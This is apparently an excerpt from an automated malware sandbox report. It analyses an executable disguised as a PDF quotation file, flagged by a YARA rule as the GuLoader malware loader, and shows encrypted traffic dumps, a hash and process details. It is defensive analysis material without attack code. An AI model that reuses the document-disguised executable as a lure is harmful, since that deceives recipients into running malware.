                            2021-12-01 10:57:39 UTC40INData Raw: 17 e7 2c 78 6d 8f c2 01 3a 91 2e fa 57 91 39 8a 9c fd e1 f5 29 34 46 7a c7 40 de 5c c1 52 26 a6 0f e6 50 72 c1 62 0f 44 2f 5a 22 a5 4d 76 ad 0a ba 12 c0 db 39 4e d1 0c 6d 39 55 75 ee 97 0b 6e 8b ad 80 7e 3f 22 41 15 37 1f d3 73 db 78 8c 59 70 d4 d3 4f 04 03 46 8f cf 35 77 0f fe e9 a2 cf 19 d5 d6 1a 4b 9f 7d 0f 33 3f 69 82 78 57 0a a3 2d 5a 63 2c 57 72 8d 4a 5a 32 36 9d 38 3b b8 27 9f 85 f3 99 2e 29 28 16 19 58 64 62 a1 c6 0c 9f e8 72 5d c4 7e 48 21 da de bc 53 ab 97 7d c9 80 62 d2 64 d9 79 d2 28 11 05 fd 21 f1 8a 66 48 7a 9c da 5b a5 9d 19 77 d4 35 66 e9 4e 99 a6 e5 0a ad 03 86 e6 e8 29 d3 35 76 4b 95 6e 8a 68 f7 bc 39 7c 00 c7 13 00 08 a7 f9 c5 bb ef 1a f3 a6 9b 85 a0 d4 97 0f b8 65 1e 76 d4 ac 64 42 d1 d8 e1 1b fc e4 82 3a 3c 3d 76 02 c1 3e 2d a6 18 1f
                            Data Ascii: ,xm:.W9)4Fz@\R&PrbD/Z"Mv9Nm9Uun~?"A7sxYpOF5wK}3?ixW-Zc,WrJZ268;'.)(Xdbr]~H!S}bdy(!fHz[w5fN)5vKnh9|evdB:<=v>-
                            2021-12-01 10:57:39 UTC42INData Raw: cb 56 d7 e1 8c 41 10 4b 8e 84 ce f7 7d b0 40 10 91 74 59 0e c6 fc 0e f0 c4 c5 56 b2 cb f9 c0 e2 c6 0a b9 4f c8 54 ea db 5f 1d b2 f7 fb 14 a4 17 87 a7 ba 6b bc 13 db a4 e6 80 25 74 c6 71 d9 ef 3d 3a 0b e1 5c 20 2a 61 34 09 14 78 44 bd bc f5 b2 95 3e 94 fa 51 e6 1f 9b 20 77 0d 50 90 68 39 1b 5c 9a 80 f3 99 bd d7 ba ec ce 6b 00 29 1a cc ed 96 5d 4a 87 55 d4 34 38 24 5a a0 7f 35 26 cf a0 67 6d 27 d7 76 cc ed f3 42 1f 50 17 0d 8c 4e c6 22 a8 52 a3 2b d5 55 84 9f 6c 40 77 1a ca 54 7c e8 df ce 4d d4 30 a4 fc 93 50 1e 3a 23 f5 78 54 d0 ec d3 55 26 8a a2 39 c2 61 f4 cd a2 d9 f7 42 15 86 ff 2a a8 30 2c 40 5c 80 4d 6f 09 38 77 1e e0 53 1b 80 80 1e 7d 10 be 68 ec 37 79 68 e3 8b cd 12 e5 d4 55 7a 6b 82 7a 71 29 2b 9c 4c 50 dd f3 8f 07 54 3b b6 99 1e 48 dd 34 84 dc aa
                            Data Ascii: VAK}@tYVOT_k%tq=:\ *a4xD>Q wPh9\k)]JU48$Z5&gm'vBPN"R+Ul@wT|M0P:#xTU&9aB*0,@\Mo8wS}h7yhUzkzq)+LPT;H4
                            2021-12-01 10:57:39 UTC43INData Raw: 37 65 8c ea df 0a 45 b3 d7 a7 73 0c da 1e 60 d1 5f 25 d1 d3 bd 1b 88 87 79 00 4a 7b a3 95 0f 74 04 69 82 9b ef ea 26 21 85 e1 1c 59 b8 fa 77 fb 33 65 ce 03 ef 8e cc 10 d6 07 4c e2 98 a3 20 a5 bc 6f 14 bc 7a e6 ab 18 ad d7 e8 1d 59 c4 9c 68 37 f0 a1 a6 44 b5 3e 28 36 c6 8d c0 10 d3 7a 6d 9c de 7b 81 85 56 c3 9c f9 90 1d d6 76 4e 6d 2a 8e 41 da 0e e5 36 e2 e6 90 2a 0a e2 60 d3 dd d5 33 6a 57 1d e3 17 05 31 a1 ba eb c1 3a f5 bd b0 c5 e8 7b 37 b7 2d 2a 4b f3 9e 64 b6 f1 65 76 9d 7e 5c 1f a1 55 bb a0 4d 42 c3 97 66 a3 dd bc fa 45 8a 27 d0 7b b3 7f 60 88 80 c1 ab 5d d7 2d 4c a3 27 98 a1 14 d6 5e 92 05 f8 ad 24 0f 62 8c 5d 87 3b 52 b5 dc 47 c7 54 2d 4d da d7 07 1c bf 91 ea 1f da ad 2e eb 2e c3 00 d4 59 5f 1a 5f 8d 23 6d c4 d7 35 39 e5 cb d4 c8 57 aa 51 4b dc c0
                            Data Ascii: 7eEs`_%yJ{ti&!Yw3eL ozYh7D>(6zm{VvNm*A6*`3jW1:{7-*Kdev~\UMBfE'{`]-L'^$b];RGT-M..Y__#m59WQK
                            2021-12-01 10:57:39 UTC44INData Raw: fc eb 87 86 f3 79 0d 8a ef 00 09 29 ca a7 57 43 35 ed 78 d4 09 38 39 a8 56 ea b4 bd 59 35 a7 85 67 ad 98 0f 39 98 b9 ff 6c 8d b0 d8 ea dc b9 8d ec 48 54 d0 22 2c ba e8 ec f3 91 5d da b6 d2 4c 3d fc 48 d3 88 0c 53 ef 67 a8 7a bc f0 78 d1 a3 06 2a f6 e2 2a 9c a4 44 92 01 6d 4d 1e 5c 55 3e 58 7f 5d 28 d6 0a 78 29 35 10 5a 92 4b 9c ed 39 c2 1d e7 a4 79 f6 37 d1 e0 79 8b fa 5a 68 7c 6f 50 97 47 6f af 6b d7 17 a4 6b 61 45 22 09 f9 d7 c8 d3 91 af a2 fb d6 2f b9 b7 47 c0 4a ea 86 24 8f 8e 56 ce b9 13 10 1a c9 4f 96 ea c4 e1 71 87 6f e5 4e a3 d9 d6 b1 6e 02 7e 31 23 f9 2b 6b f9 22 40 d2 88 d1 36 84 e5 fc 7b ca 11 71 c9 95 bc f9 b7 6d c8 7d 10 c3 5d b9 c7 55 59 80 8e 02 b6 d4 d2 4e 49 9e 78 3b 0a 8b 67 11 fa 79 f5 84 f9 4a 7a 8a 78 81 33 7e 55 b2 ab e6 e4 f9 7d d2
                            Data Ascii: y)WC5x89VY5g9lHT",]L=HSgzx**DmM\U>X](x)5ZK9y7yZh|oPGokkaE"/GJ$VOqoNn~1#+k"@6{qm}]UYNIx;gyJzx3~U}
                            2021-12-01 10:57:39 UTC45INData Raw: ad 48 61 93 43 60 a5 f7 d7 35 4b 8c c8 70 19 43 28 d6 c7 9e 56 ea 8f f2 de c0 cd e4 7c 45 19 d3 98 32 a2 bc f2 6e 62 49 97 09 91 a6 43 53 28 c3 c8 a5 de ad 24 ca df 28 5d e1 fe 50 f1 cc c6 08 ba fb c9 ee 8a c3 7c 49 4c d7 a0 43 66 63 86 67 b8 90 f8 47 9a 4d aa e1 15 27 4c 45 2f 1e b2 58 39 d7 41 04 e1 6d 0d 3f b5 83 85 25 cf c0 5c 5d 77 6d 07 be 97 e6 c5 aa f1 d0 e7 7b d6 bd de e9 d9 2b a1 fd 6a a3 01 e8 9d 5b b5 22 df 37 1a 9b b2 a1 f8 ba 01 6a b5 0f e8 51 7a d0 73 ca 8d b6 2b 64 70 9d 56 22 1f 90 33 5c d2 24 b9 17 6c 46 d2 66 b6 31 e3 b4 57 25 3f 9e f8 1c 01 1d 20 39 bd 0b 89 a7 f9 c5 25 53 72 54 cd 8a 09 b4 8a 3d 42 03 be e2 4a 31 9d 11 a1 5b af e0 65 b1 60 40 1e d0 4d cc db 19 4d e4 85 35 2d 39 cf 14 43 c0 68 00 a7 af 37 cb 93 67 20 21 ab 54 07 25 46
                            Data Ascii: HaC`5KpC(V|E2nbICS($(]P|ILCfcgGM'LE/X9Am?%\]wm{+j["7jQzs+dpV"3\$lFf1W%? 9%SrT=BJ1[e`@MM5-9Ch7g !T%F
                            2021-12-01 10:57:39 UTC47INData Raw: ae 52 0a fe 47 55 28 34 50 89 8e 0d 63 20 c7 12 89 5f 37 65 a5 e2 4a 93 f1 55 39 e4 70 0f 98 43 aa f2 52 ce 0c df 43 b1 1b cf 12 4d 39 b2 45 d2 03 e4 96 af 96 7c ed e6 f9 75 15 c4 92 60 63 27 27 27 bf 10 73 9e 66 be 68 ba 77 a3 5b aa 4d da 0e 47 e8 c4 a8 a3 79 85 8e e5 ca 04 63 d6 58 e8 1e 9c ea b2 91 79 83 21 a7 63 f6 d3 d6 c7 5b da c9 20 61 d0 62 61 f9 50 48 19 1c 5e 74 b1 a8 f6 7b bc e4 69 8a d6 fe c8 f6 67 c8 0b 46 29 11 7e 85 68 1c 8a 8e 74 8f b1 0b 29 0b a7 41 31 0a fd 16 e1 b6 f6 b7 c1 c4 40 7a fc 83 b1 37 30 17 f3 9a ec e4 f9 10 83 89 ea 95 14 66 2a cd 90 0a 0f a7 8e e7 c7 b2 33 4e 9c 69 22 e4 98 3c 0d b0 f1 a6 9b a7 1b d7 03 b4 4f ad 7c 76 dc 24 f4 97 0c bc 4c c6 74 ae 49 3d 29 7a 59 0f 1d 09 4a dd 7f 5f 00 60 ec 17 5a 57 47 8c d1 8a 55 e1 a9 43
                            Data Ascii: RGU(4Pc _7eJU9pCRCM9E|u`c'''sfhw[MGycXy!c[ abaPH^t{igF)~ht)A1@z70f*3Ni"<O|v$LtI=)zYJ_`ZWGUC
                            2021-12-01 10:57:39 UTC48INData Raw: d7 5f 7e 5f df 42 25 b1 fb f0 47 ee c3 08 a6 64 65 59 2a 27 1e 66 d3 74 c4 02 46 f0 0e 05 3f b2 43 ff 75 41 82 41 3a 7f 6d d5 36 6b a7 3a e8 e8 8b ef 7b 97 a0 fa 9d 5c 69 84 a2 62 a3 fe 6e f7 53 72 60 fe 64 12 9b a4 8e e4 3e c6 66 80 58 e0 51 85 18 40 75 bd cc 78 d6 80 dc c2 1c a0 2b 03 26 9d fb 07 50 e9 95 54 de 86 4b a8 4f a8 da b4 11 f6 67 31 67 67 08 0a 7f cf a9 08 09 15 29 31 2c d3 72 4e 6c 4f f9 72 79 81 d8 4d cd 94 29 e4 13 9f 9a 5e 99 7f b0 90 17 bd f8 eb 63 7a 53 7f 5a 21 d5 8d 8c 73 ba 5b 7f 99 25 bf f4 17 bc 10 5b 84 e6 07 1e 83 ba 40 80 6a 43 ce a1 84 b4 b9 61 f8 b1 09 04 dd 18 6c 35 e8 7c cc 26 dd 98 c4 5e fd 22 b5 91 80 43 fc 84 f5 8d d7 7a 3a 90 15 9e 77 3e 0f 70 f4 08 e0 5c eb f5 03 f2 60 22 69 8f a6 37 ee f9 30 0e 63 59 28 d9 77 68 bf 44
                            Data Ascii: _~_B%GdeY*'ftF?CuAA:m6k:{\ibnSr`d>fXQ@ux+&PTKOg1gg)1,rNlOryM)^czSZ!s[%[@jCal5|&^"Cz:w>p\`"i70cY(whD
                            2021-12-01 10:57:39 UTC49INData Raw: 30 f0 da a4 dc fb 95 91 b7 d0 86 b1 fe 7f 85 6e ed 43 34 e8 94 7d b1 18 9c 1a 8d e2 39 08 63 86 36 f0 d3 a4 15 2a 42 46 62 4c 81 64 61 82 c7 77 54 97 1c 5d fc ae f6 84 35 dc 4e 01 94 cb 81 f0 67 fe f7 db 80 9a 3c b4 2d 1a 8a fc 60 6f 48 80 6b 36 e6 47 31 f5 74 55 d8 3d b4 8e fc c2 40 c0 fe 0d c0 b8 72 52 ca 9c ec 56 4e 91 7d 96 a8 d4 21 60 2a f1 e4 88 4b 28 cc aa f6 b4 33 bf 18 b1 e6 55 c2 75 20 b6 f1 9e 29 03 ee 60 3b 79 64 94 bb 4e a6 30 4d 50 34 31 e1 c6 c3 96 fc 90 2c ae 61 b1 02 ff 31 e5 3d cb 70 d2 d4 71 ba ae b8 b4 14 26 21 6a 91 8f 50 e1 d4 b3 8f 32 9a 51 d6 5b bf 21 42 ee 9a 5b a4 0f e6 ae 4c 06 7d 94 78 8a a7 5e 9e 79 fc 33 fe 72 13 77 d9 39 4e c6 ad f6 fe e7 0c e5 7f ac 28 ca d8 20 c9 8d 5f 46 fd 9c 59 13 3f a6 d3 ae 81 4f 7c a7 5c cf 64 2a fd
                            Data Ascii: 0nC4}9c6*BFbLdawT]5Ng<-`oHk6G1tU=@rRVN}!`*K(3Uu )`;ydN0MP41,a1=pq&!jP2Q[!B[L}x^y3rw9N( _FY?O|\d*
                            2021-12-01 10:57:39 UTC50INData Raw: da fc 75 66 8d b9 cc 3f 1e f3 cf ad ce 5e d0 2c 3d 45 fd a0 b1 dc df d0 b6 6d b4 b1 3a 7f 91 c1 72 59 ef 15 c2 0d e0 ba 3a 84 d9 0c 2a 09 77 ba 15 63 06 c3 77 67 4d a4 8c 55 3c 54 3d 00 5a dc 0a c2 b9 f4 dc 5d d0 12 f2 e7 39 78 02 78 64 33 b4 52 bb ea 79 31 87 5f 76 bb 2d 31 f1 4d 6f 10 6b f9 fa a8 29 0c 27 28 09 09 80 c5 97 3c f5 cb a5 dc 2f 81 72 48 e9 fc d2 4e 8f c4 7b 6e c6 c0 d1 ee 22 00 6a 26 c5 fc 64 89 31 19 dd 71 0e 2c 29 89 ae 36 7f 18 1b 7c d2 15 c7 1a 8d 59 af 66 0e 40 da c0 c9 f2 11 b5 39 ee 84 f1 5d 99 7f 45 b3 c1 a2 46 ff 11 1d 76 f2 3a 7a 55 b8 11 71 fa bf 82 f6 b3 e3 01 05 ce cd c1 ef 5d c4 26 7e 0c 83 30 17 23 9c ec e4 0e c9 b3 d5 7d ef a9 8f 12 b7 c4 7c c0 10 80 17 de 06 0b 34 0b 51 99 23 50 07 d9 6d c9 dc 8c 2c ec 60 7e 30 9b 54 44 0c
                            Data Ascii: uf?^,=Em:rY:*wcwgMU<T=Z]9xxd3Ry1_v-1Mok)'(</rHN{n"j&d1q,)6|Yf@9]EFv:zUq]&~0#}|4Q#Pm,`~0TD
                            2021-12-01 10:57:39 UTC51INData Raw: 2b 0b 7e 7a c8 66 d4 f7 27 79 3c 59 51 9b 79 83 62 70 4b 64 c7 8a 68 1c b8 59 b6 45 b6 c1 a9 8d 04 f9 94 44 f8 6c cb f7 cb d2 f0 d5 d8 60 47 9a f6 40 87 e2 e0 44 5a 00 e1 4d 14 6d b8 15 f0 a4 a5 aa 97 1a ba 4f 9f 79 f8 b1 d5 e9 d3 f8 b8 e0 ad fc 6d 74 21 ef 54 1a 61 aa cd cd bc cc ff f2 a3 01 8f a2 72 f4 e5 d7 14 dd 67 4d ae b6 c1 d1 d0 e8 f3 4f f9 d5 ff 7b 15 85 b6 bc 15 16 62 42 68 11 b0 c7 a3 2d 51 07 7f 07 81 3d de 17 fd ea e2 bf 57 db a6 82 c8 a6 8b 9e f3 78 0b 8d 63 7c 05 83 53 5d 81 7a da 17 9b 54 96 4a 03 29 4b db 73 dc 5b af b9 5c 1f 9a 33 7f 9f 9b d7 45 bd f8 12 4d 57 2b cf 2d 55 e1 6f 39 ba 07 70 99 25 0f f3 41 e3 3f 47 3c e2 07 62 c3 42 71 40 eb a0 93 df bb bf 46 d7 fc 99 72 75 fa 1c c4 9d e8 d1 ce e3 db 4a f0 b5 6d 22 f3 14 0d 97 cf fe ea 27
                            Data Ascii: +~zf'y<YQybpKdhYEDl`G@DZMmOymt!TargMO{bBh-Q=Wxc|S]zTJ)Ks[\3EMW+-Uo9p%A?G<bBq@FruJm"'
                            2021-12-01 10:57:39 UTC53INData Raw: 7c 39 c2 bb cf 98 0c d9 18 21 ea 79 2d 3c b8 ca 18 57 2a 56 e5 78 cc 0f 60 63 36 f7 d7 19 88 b6 58 14 a4 ca 76 02 27 31 24 b8 ee 9d f9 17 eb 59 59 80 7a f2 6d 4f f7 7a 9a 31 cd 0b d7 15 3b e1 22 99 19 57 c3 3c da ee cb 5b 35 7e 18 f9 d0 33 66 c1 58 7c a6 af 66 22 b9 19 37 43 b0 ec 4e 39 ee 33 01 31 92 f0 07 4a 36 a2 46 62 d7 38 53 b6 b8 7f bf 20 6f 8d dc fd 4a 12 c6 75 b4 3d 74 ba b1 44 51 ca b2 b6 c5 70 b6 87 da a4 56 8b 7d cd 7a b4 ea 55 48 d4 93 3f 1d 44 7a 77 c7 9c dd ac 0b f4 8b 89 13 da d4 7e 98 e9 47 59 70 dc d4 da 60 01 3b ca 7e 4e 66 4c b9 2a 3a f1 53 7a 27 fb 0c 89 d9 96 db 3a c4 89 b4 c0 7f 52 39 ba f3 3d 3a 69 fd cb a9 a6 d7 e4 a9 83 61 7a cc 27 7d 11 22 6e 06 5d de d7 cd 6c db ae d7 7f 45 e2 cb f6 c5 6e dc 12 9d e4 ad 4d be e0 68 72 d3 57 4a
                            Data Ascii: |9!y-<W*Vx`c6Xv'1$YYzmOz1;"W<[5~3fX|f"7CN931J6Fb8S oJu=tDQpV}zUH?Dzw~GYp`;~NfL*:Sz':R9=:iaz'}"n]lEnMhrWJ
                            2021-12-01 10:57:39 UTC54INData Raw: 5c 01 f4 95 a8 dd ff f8 02 92 2d fb 55 78 ac 61 8e 9a cb 04 a2 06 62 a3 a7 6c c7 e3 30 25 2e 98 bd 8c 35 f1 18 c1 58 b4 c0 d2 40 51 7a d0 f2 5e 76 22 95 2d 29 cb 0c 4e 65 db 4f 5b 74 59 7d 50 62 04 a0 20 be 31 e3 c1 bb cd e4 06 82 5f af bd 8c 1b ce f3 b4 9f 25 5b e1 6c cd 8c a7 68 1c b0 5a 72 59 7f ad 3f d8 18 84 bc 69 f5 d1 5a 7e 3a ea 2e ce 9e 8d e6 74 8c db f1 ea c9 0f 77 0f 2c ec 55 f5 e2 ef 9f d0 54 7c dc b1 57 11 f3 a0 8b 7f 28 cb c5 5d 9e 70 74 1d c2 fc da 2d 46 a0 e7 8c a6 67 92 e6 f2 89 de 29 dd 48 f5 68 df 5c c9 e6 ca 7e fd 98 33 cc d5 5c 5c 6b 82 d6 32 a6 7d 6d 7e e5 2d c0 2e 97 77 88 5a 52 68 22 cd 37 3a ec 18 63 21 3b 6e e3 bb 18 d5 08 42 43 c6 01 45 3c 68 79 81 77 5d 63 92 f7 08 a7 7f ba 74 8e 51 22 24 cf 84 b3 ca 29 6e 31 46 37 c2 49 e2 56
                            Data Ascii: \-Uxabl0%.5X@Qz^v"-)NeO[tY}Pb 1_%[lhZrY?iZ~:.tw,UT|W(]pt-Fg)Hh\~3\\k2}m~-.wZRh"7:c!;nBCE<hyw]ctQ"$)n1F7IV
                            2021-12-01 10:57:39 UTC55INData Raw: 27 43 c4 07 67 01 67 9e 73 d7 8b 24 a8 99 fe 85 ff 09 84 35 a7 47 90 7b 7a 2b f0 ad 03 7b 7f c9 b5 91 87 2f 1a 23 1b fc ac a6 72 da 77 52 b8 26 ec f3 99 ee ac ba 47 f5 57 be d3 8a c6 7d 86 be 92 df 64 94 e4 f9 26 83 8d d2 25 e8 66 9c 32 34 8b b9 10 b6 08 0b 21 cd 4e 62 5e 99 e9 6b 40 94 49 e6 be 2a 2c ec 1c 00 79 64 21 7f 76 56 08 4f 9a ff c0 dd 3f 63 92 fc b7 2e 3b 9e e0 c0 0f c0 ca 47 22 b9 d4 62 92 52 6f 3e 8c 6e 39 a9 4d 91 f3 e9 8d ed 74 e2 14 e2 51 d6 38 bf 4b 0b d6 6a 57 a6 c5 2d dc c7 3e 9f f2 7b 99 a5 5e 14 f5 0a 20 8e 4a a3 b3 dd 8f b1 66 d2 b3 39 df 0a d5 c2 b8 d4 49 d8 2d d6 a2 f6 cb ff 9c f5 72 55 f7 0c 96 52 5b a1 2d 5c 78 10 13 29 70 47 03 7d 44 fe e4 d5 a1 3a d6 ed 3d 15 e0 0f c9 9d e3 82 0c 50 fc 83 c9 d3 6b 33 2d 72 f7 2e 5a cb 42 62 94
                            Data Ascii: 'Cggs$5G{z+{/#rwR&GW}d&%f24!Nb^k@I*,yd!vVO?c.;G"bRo>n9MtQ8KjW->{^ Jf9I-rUR[-\x)pG}D:=Pk3-r.ZBb
                            Data Ascii: -+snttg)R!)Y%>wSfZaUn$R6 SJcsiXf_v9I*!}g!36kS}[-*(8l%!7?eeyYx!5o]C6cfYS(b[)5 utD1E;J(_=eHM<GdJR
                            2021-12-01 10:57:39 UTC104INData Raw: 70 a9 28 6a f9 b9 93 8f a2 d7 26 b0 ed 4f bf 49 1a 29 a5 58 2f 53 0e f0 c4 93 05 09 e7 91 81 e2 95 e2 1e e0 37 ab 61 23 dc d9 be 72 04 1b 20 be 87 a7 ba 3c ef 7b cf c0 a7 80 cd af 79 8e 26 64 e5 b9 cf ed d9 fb 25 e5 bd 09 14 78 13 55 79 0d 4d 6a 68 fc d6 35 a7 1f c8 fd 2a fd b8 fc c7 c6 e4 df 5e 90 7a dc 45 52 7a 98 ad 99 0f 39 5f 3c 8b 99 72 4f 27 3d 95 34 4a 69 30 a1 2f dd 79 ce a0 67 34 14 21 2f 49 2d 87 71 77 b8 14 0d 8c a6 10 98 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce 0c 18 c6 3d e2 30 ed f4 31 b2 45 15 86 74 6f 50 69 7c a8 d5 0f b2 90 50 6b 9f 9c 6f ac e4 d9 d7 f6 06 9f 41 97 b5 68 27 5b 23 d0 46 f7 b8 17 03 2d 03 80 7a 71 a9 43 34 2f 11 dd 4c e7 63 15 3b e1 71 cf e6 22 cb 0f 2c 29
                            Data Ascii: p(j&OI)X/S7a#r <{y&d%xUyMjh5*^zERz9_<rO'=4Ji0/yg4!/I-qwW}T'w\#aUU=01EtoPi|PkoAh'[#F-zqC4/Lc;q",)
                            2021-12-01 10:57:39 UTC106INData Raw: a6 9a 73 82 f3 69 04 b3 81 58 a3 87 ef 66 d9 98 5f 76 82 bb 01 91 39 49 2a a3 12 c2 ea 95 e7 21 95 96 7d f3 af 89 67 21 d3 1e cc d2 8d 82 ce b2 33 36 9d 6b 53 04 7d de 85 a4 10 5b d1 a3 c8 90 2d 90 eb d4 2a 85 ea 18 fb 28 38 96 6c bc 25 21 37 a3 f2 ce f8 3f 8f e6 65 65 d9 79 59 d3 92 78 0d 21 84 e9 e5 35 82 9c af 6f cd 5d 43 36 d4 63 8e 12 89 66 59 bc 53 28 c3 89 62 5b 29 d3 35 20 a3 95 a8 75 97 74 44 31 f7 45 3b 4a 0f 8d 04 f9 c5 bb 28 5f 0b a7 9b 85 a0 3d 00 0f b8 65 9e 48 ee a3 e0 c9 d1 d8 e1 4d 14 3c 47 c5 c3 64 f5 fa c0 4a 52 f0 f0 86 07 d9 c1 80 92 f8 35 6b a7 fd 6d 74 70 10 84 29 a1 fa 9d 9b ec 24 59 9d 5c fe e7 82 1b b5 e5 5a 9f ed 64 4d ae e7 3e 01 e3 28 a3 1f ae 85 17 f6 7a 7a 49 d4 2d 7f 23 42 e5 9a 24 c4 a3 2d 00 f8 af 6d 81 57 de 41 ce 1c b4
                            Data Ascii: siXf_v9I*!}g!36kS}[-*(8l%!7?eeyYx!5o]C6cfYS(b[)5 utD1E;J(_=eHM<GdJR5kmtp)$Y\ZdM>(zzI-#B$-mWA
                            2021-12-01 10:57:39 UTC107INData Raw: 09 14 78 13 55 79 0d 4d 6a 68 fc d6 35 a7 1f c8 fd 2a fd b8 fc c7 c6 e4 df 5e 90 7a dc 45 52 7a 98 ad 99 0f 39 5f 3c 8b 99 72 4f 27 3d 95 34 4a 69 30 a1 2f dd 79 ce a0 67 34 14 21 2f 49 2d 87 71 77 b8 14 0d 8c a6 10 98 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce 0c 18 c6 3d e2 30 ed f4 31 b2 45 15 86 74 6f 50 69 7c a8 d5 0f b2 90 50 6b 9f 9c 6f ac e4 d9 d7 f6 06 9f 41 97 b5 68 27 5b 23 d0 46 f7 b8 17 03 2d 03 80 7a 71 a9 43 34 2f 11 dd 4c e7 63 15 3b e1 71 cf e6 22 cb 0f 2c 29 4e 2b ca 81 e7 e4 7c 9b 9e 06 dd 08 59 50 99 f1 01 51 09 84 35 94 b1 c6 11 7b 7c 0f 98 37 82 36 c9 5d b9 00 d0 e5 75 71 fd ff 59 47 ee 8e 1b b8 ce f5 74 66 11 fa 31 32 01 3d bf 85 75 f3 49 7f f7 92 37 63 13 1b 06 d9 f6
                            Data Ascii: xUyMjh5*^zERz9_<rO'=4Ji0/yg4!/I-qwW}T'w\#aUU=01EtoPi|PkoAh'[#F-zqC4/Lc;q",)N+|YPQ5{|76]uqYGtf12=uI7c
                            2021-12-01 10:57:39 UTC108INData Raw: 28 38 96 6c bc 25 21 37 a3 f2 ce f8 3f 8f e6 65 65 d9 79 59 d3 92 78 0d 21 84 e9 e5 35 82 9c af 6f cd 5d 43 36 d4 63 8e 12 89 66 59 bc 53 28 c3 89 62 5b 29 d3 35 20 a3 95 a8 75 97 74 44 31 f7 45 3b 4a 0f 8d 04 f9 c5 bb 28 5f 0b a7 9b 85 a0 3d 00 0f b8 65 9e 48 ee a3 e0 c9 d1 d8 e1 4d 14 3c 47 c5 c3 64 f5 fa c0 4a 52 f0 f0 86 07 d9 c1 80 92 f8 35 6b a7 fd 6d 74 70 10 84 29 a1 fa 9d 9b ec 24 59 9d 5c fe e7 82 1b b5 e5 5a 9f ed 64 4d ae e7 3e 01 e3 28 a3 1f ae 85 17 f6 7a 7a 49 d4 2d 7f 23 42 e5 9a 24 c4 a3 2d 00 f8 af 6d 81 57 de 41 ce 1c b4 57 25 b4 59 7d a0 f6 e2 df f3 f5 80 4b 60 7c 05 d2 ac 8d d7 2c 8d 41 73 0f f9 b5 fc 41 23 b2 32 dc d6 24 93 58 1f 9a 62 80 4f a8 17 c8 00 2c e6 b2 a8 80 a5 69 fe 4a c4 b4 3f 97 84 66 da 3c 0c 16 b3 d7 de 54 1d f8 e1 07
                            Data Ascii: (8l%!7?eeyYx!5o]C6cfYS(b[)5 utD1E;J(_=eHM<GdJR5kmtp)$Y\ZdM>(zzI-#B$-mWAW%Y}K`|,AsA#2$XbO,iJ?f<T
                            2021-12-01 10:57:39 UTC109INData Raw: 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce 0c 18 c6 3d e2 30 ed f4 31 b2 45 15 86 74 6f 50 69 7c a8 d5 0f b2 90 50 6b 9f 9c 6f ac e4 d9 d7 f6 06 9f 41 97 b5 68 27 5b 23 d0 46 f7 b8 17 03 2d 03 80 7a 71 a9 43 34 2f 11 dd 4c e7 63 15 3b e1 71 cf e6 22 cb 0f 2c 29 4e 2b ca 81 e7 e4 7c 9b 9e 06 dd 08 59 50 99 f1 01 51 09 84 35 94 b1 c6 11 7b 7c 0f 98 37 82 36 c9 5d b9 00 d0 e5 75 71 fd ff 59 47 ee 8e 1b b8 ce f5 74 66 11 fa 31 32 01 3d bf 85 75 f3 49 7f f7 92 37 63 13 1b 06 d9 f6 51 2d 10 dc 9f d5 32 dc 83 3f ef 49 62 0b 4b cc b1 17 ae 66 dc 5f b9 dd 49 0e 59 ac d3 13 9f c4 31 9b 54 83 89 23 e4 b0 af cb 39 94 3f 8b 51 79 48 d1 51 9e 8a c1 f0 b5 22 b8 17 8d 2d 2b 92 ba ae b8 73 91 c6 dc 95 6e c6
                            Data Ascii: W}T'w\#aUU=01EtoPi|PkoAh'[#F-zqC4/Lc;q",)N+|YPQ5{|76]uqYGtf12=uI7cQ-2?IbKf_IY1T#9?QyHQ"-+sn


                            Code Manipulations

                            Statistics

                            CPU Usage


                            Memory Usage


                            High Level Behavior Distribution


                            Behavior


                            System Behavior

                            General

                            Start time:11:56:09
                            Start date:01/12/2021
                            Path:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
                            Imagebase:0x400000
                            File size:115848 bytes
                            MD5 hash:754FA9FF30EC6E1CD7A29837ADEB7A8B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Visual Basic
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            General

                            Start time:11:56:55
                            Start date:01/12/2021
                            Path:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
                            Imagebase:0x400000
                            File size:115848 bytes
                            MD5 hash:754FA9FF30EC6E1CD7A29837ADEB7A8B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            Disassembly

                            Code Analysis


                              Execution Graph

                              Execution Coverage:3.4%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:66.5%
                              Total number of Nodes:251
                              Total number of Limit Nodes:34

                              Graph


                              Executed Functions

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !5]$DHcL$i"m$k,I5
                              • API String ID: 0-1191262246
                              • Opcode ID: 96e80fc2866cda34281e6678aa3a3c4d3cfc5150ffd61da4bdcf9f5263b37ece
                              • Instruction ID: ca9432b3cf04a64f31332ff53eb4fd183751ff4ab88186715d6a29dc6f609da6
                              • Opcode Fuzzy Hash: 96e80fc2866cda34281e6678aa3a3c4d3cfc5150ffd61da4bdcf9f5263b37ece
